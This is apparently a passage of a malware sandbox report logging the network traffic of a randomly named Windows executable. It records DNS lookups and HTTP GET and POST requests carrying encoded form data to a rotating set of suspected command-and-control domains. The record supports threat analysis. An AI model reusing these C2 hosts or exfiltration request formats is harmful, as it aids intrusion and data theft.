                                                                    Oct 30, 2024 04:57:20.402659893 CET1.1.1.1192.168.2.50xcfa1Server failure (2)www.animekuid.xyznonenoneA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:24.978745937 CET1.1.1.1192.168.2.50xac1Server failure (2)www.animekuid.xyznonenoneA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:24.978761911 CET1.1.1.1192.168.2.50xac1Server failure (2)www.animekuid.xyznonenoneA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:24.978771925 CET1.1.1.1192.168.2.50xac1Server failure (2)www.animekuid.xyznonenoneA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:30.011158943 CET1.1.1.1192.168.2.50x4ca8No error (0)www.huyven.xyz162.0.238.246A (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:43.499269009 CET1.1.1.1192.168.2.50xf290No error (0)www.dverkom.store31.31.196.17A (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:57.255835056 CET1.1.1.1192.168.2.50x8ec2Name error (3)www.longfilsalphonse.netnonenoneA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:58:05.321018934 CET1.1.1.1192.168.2.50xfe1No error (0)www.bayarcepat19.click188.114.97.3A (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:58:05.321018934 CET1.1.1.1192.168.2.50xfe1No error (0)www.bayarcepat19.click188.114.96.3A (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:58:18.630414963 CET1.1.1.1192.168.2.50x267cNo error (0)www.wdeb18.topwdeb18.topCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 30, 2024 04:58:18.630414963 CET1.1.1.1192.168.2.50x267cNo error (0)wdeb18.top206.119.82.147A (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:58:39.820667028 CET1.1.1.1192.168.2.50x2f91No error (0)www.galaxyslot88rtp.latgalaxyslot88rtp.latCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 30, 2024 04:58:39.820667028 CET1.1.1.1192.168.2.50x2f91No error (0)galaxyslot88rtp.lat162.0.209.213A (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:58:53.292062998 CET1.1.1.1192.168.2.50x4801No error (0)www.dto20.shopdto20.shopCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 30, 2024 04:58:53.292062998 CET1.1.1.1192.168.2.50x4801No error (0)dto20.shop3.33.130.190A (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:58:53.292062998 CET1.1.1.1192.168.2.50x4801No error (0)dto20.shop15.197.148.33A (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:59:06.790622950 CET1.1.1.1192.168.2.50x5b6aNo error (0)www.h5hph710am.siteh5hph710am.siteCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 30, 2024 04:59:06.790622950 CET1.1.1.1192.168.2.50x5b6aNo error (0)h5hph710am.site144.34.186.85A (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:59:20.368876934 CET1.1.1.1192.168.2.50xfd16No error (0)www.lanxuanz.techzhs.zohosites.comCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 30, 2024 04:59:20.368876934 CET1.1.1.1192.168.2.50xfd16No error (0)zhs.zohosites.com136.143.186.12A (IP address)IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • www.ngmr.xyz
                                                                    • www.drivedoge.website
                                                                    • www.fieldelse.net
                                                                    • www.patioprojex.africa
                                                                    • www.huyven.xyz
                                                                    • www.dverkom.store
                                                                    • www.bayarcepat19.click
                                                                    • www.wdeb18.top
                                                                    • www.galaxyslot88rtp.lat
                                                                    • www.dto20.shop
                                                                    • www.h5hph710am.site
                                                                    • www.lanxuanz.tech

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.54990054.67.87.110801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:56:09.419415951 CET467OUTGET /fu87/?vxPD=qh6vHM1wnebxXDDw2+FKNmF+EgGb6h3lhyJTJqyJk9tXxJTOz685U0RnFTuJgXE78BkDdexAIHcYDkJjTquRDOTOtPaRUKFiNfEDt1vQqQEhgT+IhmyUGPK3HCAi1oMdiQ==&7JH=bvSPlHnHQ4A HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.ngmr.xyz
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Oct 30, 2024 04:56:10.098536968 CET550INHTTP/1.1 404 Not Found
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Content-Length: 282
                                                                    Accept-Ranges: bytes
                                                                    Date: Wed, 30 Oct 2024 04:19:38 GMT
                                                                    X-Varnish: 1439864526
                                                                    Age: 0
                                                                    Via: 1.1 varnish
                                                                    Connection: close
                                                                    X-Varnish-Cache: MISS
                                                                    Server: C2M Server v1.02
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 75 38 37 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fu87/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.549981195.161.68.8801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:56:25.303983927 CET742OUTPOST /czka/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 205
                                                                    Host: www.drivedoge.website
                                                                    Origin: http://www.drivedoge.website
                                                                    Referer: http://www.drivedoge.website/czka/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 54 65 57 66 36 66 70 54 6b 45 66 66 69 4a 67 35 37 58 35 6d 75 65 51 43 6f 58 45 6e 58 61 78 37 6f 33 70 69 62 64 52 6e 33 41 64 68 52 2b 58 62 41 64 41 6a 79 37 75 4b 6f 39 2b 6f 71 6b 37 33 2f 38 63 76 42 34 78 4c 6c 66 65 2b 68 6f 4e 45 72 6d 72 53 70 35 66 61 44 64 34 2f 45 4d 5a 49 66 6a 52 69 46 4e 52 67 78 44 75 78 73 44 33 73 48 50 36 68 34 75 44 43 55 41 4b 6d 68 37 6e 54 58 2f 58 68 69 67 6f 4f 52 67 52 59 66 79 65 49 55 54 54 62 63 6d 2f 4b 32 4e 42 41 2f 4b 6c 44 52 67 78 66 36 64 6d 74 34 37 30 68 42 38 4f 42 78 7a 66 36 6d 72 2b 35 35 35 4c 6d 61 4e 43 70 4b 50 72 78 77 4c 73 3d
                                                                    Data Ascii: vxPD=TeWf6fpTkEffiJg57X5mueQCoXEnXax7o3pibdRn3AdhR+XbAdAjy7uKo9+oqk73/8cvB4xLlfe+hoNErmrSp5faDd4/EMZIfjRiFNRgxDuxsD3sHP6h4uDCUAKmh7nTX/XhigoORgRYfyeIUTTbcm/K2NBA/KlDRgxf6dmt470hB8OBxzf6mr+555LmaNCpKPrxwLs=
                                                                    Oct 30, 2024 04:56:26.233187914 CET778INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 30 Oct 2024 03:56:26 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 634
                                                                    Connection: close
                                                                    Server: Apache
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.549982195.161.68.8801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:56:27.854671955 CET762OUTPOST /czka/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 225
                                                                    Host: www.drivedoge.website
                                                                    Origin: http://www.drivedoge.website
                                                                    Referer: http://www.drivedoge.website/czka/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 54 65 57 66 36 66 70 54 6b 45 66 66 6b 70 51 35 39 30 52 6d 6e 65 51 46 74 58 45 6e 63 36 77 79 6f 33 6c 69 62 5a 70 33 30 7a 31 68 55 72 72 62 44 63 41 6a 33 37 75 4b 77 74 2f 69 6b 45 37 34 2f 38 59 57 42 35 4e 4c 6c 66 4b 2b 68 73 46 45 72 58 72 56 6d 4a 66 59 4a 4e 35 35 41 4d 5a 49 66 6a 52 69 46 4d 31 61 78 44 57 78 73 33 7a 73 47 75 36 69 37 75 44 42 45 77 4b 6d 33 37 6e 66 58 2f 58 50 69 68 31 70 52 6a 70 59 66 77 57 49 55 69 54 61 54 6d 2f 49 36 64 41 6b 76 37 34 56 66 57 39 30 6e 65 2b 76 74 4e 45 63 4e 71 6a 72 72 52 58 53 31 4c 53 42 70 71 44 52 4c 39 6a 41 51 73 37 42 75 63 36 34 73 64 53 5a 52 34 30 71 67 43 76 35 72 52 6a 2f 75 72 67 57
                                                                    Data Ascii: vxPD=TeWf6fpTkEffkpQ590RmneQFtXEnc6wyo3libZp30z1hUrrbDcAj37uKwt/ikE74/8YWB5NLlfK+hsFErXrVmJfYJN55AMZIfjRiFM1axDWxs3zsGu6i7uDBEwKm37nfX/XPih1pRjpYfwWIUiTaTm/I6dAkv74VfW90ne+vtNEcNqjrrRXS1LSBpqDRL9jAQs7Buc64sdSZR40qgCv5rRj/urgW
                                                                    Oct 30, 2024 04:56:28.769059896 CET778INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 30 Oct 2024 03:56:28 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 634
                                                                    Connection: close
                                                                    Server: Apache
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.549983195.161.68.8801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:56:30.401637077 CET1779OUTPOST /czka/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 1241
                                                                    Host: www.drivedoge.website
                                                                    Origin: http://www.drivedoge.website
                                                                    Referer: http://www.drivedoge.website/czka/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 54 65 57 66 36 66 70 54 6b 45 66 66 6b 70 51 35 39 30 52 6d 6e 65 51 46 74 58 45 6e 63 36 77 79 6f 33 6c 69 62 5a 70 33 30 7a 74 68 49 4a 54 62 45 50 59 6a 30 37 75 4b 34 4e 2f 68 6b 45 37 66 2f 38 67 53 42 35 42 68 6c 61 4f 2b 37 4c 46 45 36 46 54 56 78 35 66 59 48 64 34 2b 45 4d 59 53 66 6a 42 6d 46 4e 46 61 78 44 57 78 73 78 66 73 46 2f 36 69 33 4f 44 43 55 41 4b 79 68 37 6e 37 58 2b 2f 35 69 68 77 65 52 53 4a 59 66 54 2b 49 57 77 4c 61 61 6d 2f 47 35 64 41 38 76 37 31 4c 66 51 5a 53 6e 64 6a 4b 74 4b 6f 63 4a 63 4c 78 7a 31 54 2f 6e 39 48 6d 37 37 37 4f 57 70 36 6a 54 61 6e 54 70 39 53 33 72 38 47 54 66 64 6b 33 69 42 57 53 77 56 66 37 6d 71 68 6e 65 49 37 6f 4f 67 48 4f 66 67 32 65 6a 6e 6a 72 50 54 6b 51 31 66 38 77 54 30 6e 50 74 57 4e 56 6f 36 2f 4f 7a 46 7a 42 79 77 38 58 30 72 37 35 71 76 4f 51 71 54 78 31 76 6e 37 74 4f 58 74 42 46 69 51 76 72 53 52 5a 54 43 45 2f 6e 6d 71 45 6c 61 73 6a 47 63 2b 56 49 32 62 45 6e 54 34 65 72 49 37 67 55 50 58 69 41 59 6a 75 50 46 78 71 30 [TRUNCATED]
                                                                    Data Ascii: vxPD=TeWf6fpTkEffkpQ590RmneQFtXEnc6wyo3libZp30zthIJTbEPYj07uK4N/hkE7f/8gSB5BhlaO+7LFE6FTVx5fYHd4+EMYSfjBmFNFaxDWxsxfsF/6i3ODCUAKyh7n7X+/5ihweRSJYfT+IWwLaam/G5dA8v71LfQZSndjKtKocJcLxz1T/n9Hm777OWp6jTanTp9S3r8GTfdk3iBWSwVf7mqhneI7oOgHOfg2ejnjrPTkQ1f8wT0nPtWNVo6/OzFzByw8X0r75qvOQqTx1vn7tOXtBFiQvrSRZTCE/nmqElasjGc+VI2bEnT4erI7gUPXiAYjuPFxq09zhqClHBmm4G4Wft8ARKA6jzvQlG37a5SScd16xuletBEoBxjBZJALyecZkfthL29x9Oz8gI5nSiArnj47qTpoKUptcWef406fSu1ssXjBhpzF7+awul/zjEMOISCJymh37oDqUbdpG6LZdB+Mg6Td+N1nutxeIKQyzDo2LVPxZnqgZeUVGgUJY1N3DSrbXHr5uJ8WgaEZkxRK0WIKJst5X6GkqkPo4A+BkdbStiYJb9+RueqhHrn1zd1TW5IGQSakfAKit7jUdOpOFlTJAkfyHUguA0tIz822uNgGXVAuc4ZkgFhKtoZmQA1s5stgPgu1hWOtWhdriyCTuUqYQnRtB4Wl+Pq8lB5gWpqIEYpbFdyhxWk6mncTNTaNiRLkX4pb3MQ2lOI+M0/ng2Vp2/0yxZZH4qCRhY5np9dikiloZROB2ARea/L9IXKGr3e0+PCH4RRbhQ84MwNbuVTrTNQkpBKc6XOZAKSloNepfT2BM7W3Z0bbMFtXl2PIBLlrWykRGblJaeKEVnXr3qNJ1ltZW3MrwtJRAp0M3vJ9AwfaLXcfA07S35AJkw0WiSkvjp9cZ33GiAK/8zKzJd7LP2uDOzjzt5ByfzLvB/dd95oFa7A6QDWDbmEwvO5vKUKEzesLNCzbflF/1n0hHemGIQz5eCx1SHObPvB2 [TRUNCATED]
                                                                    Oct 30, 2024 04:56:31.351433039 CET778INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 30 Oct 2024 03:56:31 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 634
                                                                    Connection: close
                                                                    Server: Apache
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.549984195.161.68.8801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:56:32.955595970 CET476OUTGET /czka/?vxPD=ec+/5ooiqEi687og6mxZgK97hGtyT8hL+UNAVpoR3RpVRqn8W9A98dmq3fmGshL635UHDIR5u/r4iIgXkla3rsnbIqFgNahEcjh4DtJ4lSLz0jzSBM29wabUMiG34aKFBg==&7JH=bvSPlHnHQ4A HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Host: www.drivedoge.website
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Oct 30, 2024 04:56:33.889121056 CET778INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 30 Oct 2024 03:56:33 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 634
                                                                    Connection: close
                                                                    Server: Apache
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 [TRUNCATED]
                                                                    Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.54998718.141.10.107801492C:\Program Files (x86)\NAXjQwOxPJIdnJBYBNfGJpJjLIAkCkkWbrVUswdurkTaBfBKxAasSeLCBzqa\hEtOKWgxZfeL.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Oct 30, 2024 04:56:39.350809097 CET730OUTPOST /exug/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 205
                                                                    Host: www.fieldelse.net
                                                                    Origin: http://www.fieldelse.net
                                                                    Referer: http://www.fieldelse.net/exug/
                                                                    User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MALC)
                                                                    Data Raw: 76 78 50 44 3d 65 57 42 73 6c 79 58 50 75 6a 59 79 62 6e 73 61 55 72 68 47 49 70 57 6f 6f 6d 71 30 41 56 6c 74 52 57 57 70 2f 47 47 78 35 4b 6c 43 58 4b 6d 52 4d 50 34 5a 63 31 6c 55 4a 47 45 55 42 4d 4d 4d 53 44 64 4b 72 53 64 51 63 6e 36 6f 45 30 35 59 43 65 6c 68 47 54 41 76 36 51 62 56 41 4b 4b 79 79 30 56 58 6c 4b 69 49 5a 62 48 77 46 36 6d 56 6f 59 6d 78 6b 41 48 34 6e 41 79 59 49 30 50 4b 55 32 4c 33 54 44 63 69 4d 6b 59 67 65 77 73 52 52 4c 69 68 4b 63 66 67 79 47 58 66 2f 33 6a 6a 55 63 38 48 59 72 4c 59 6c 71 45 72 72 47 6e 67 41 53 72 79 6b 50 68 78 34 43 71 4c 77 44 50 65 6c 47 46 67 66 43 30 3d
                                                                    Data Ascii: vxPD=eWBslyXPujYybnsaUrhGIpWoomq0AVltRWWp/GGx5KlCXKmRMP4Zc1lUJGEUBMMMSDdKrSdQcn6oE05YCelhGTAv6QbVAKKyy0VXlKiIZbHwF6mVoYmxkAH4nAyYI0PKU2L3TDciMkYgewsRRLihKcfgyGXf/3jjUc8HYrLYlqErrGngASrykPhx4CqLwDPelGFgfC0=
                                                                    Oct 30, 2024 04:56:40.787415981 CET724INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 30 Oct 2024 03:56:40 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: btst=; path=/; domain=.www.fieldelse.net; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
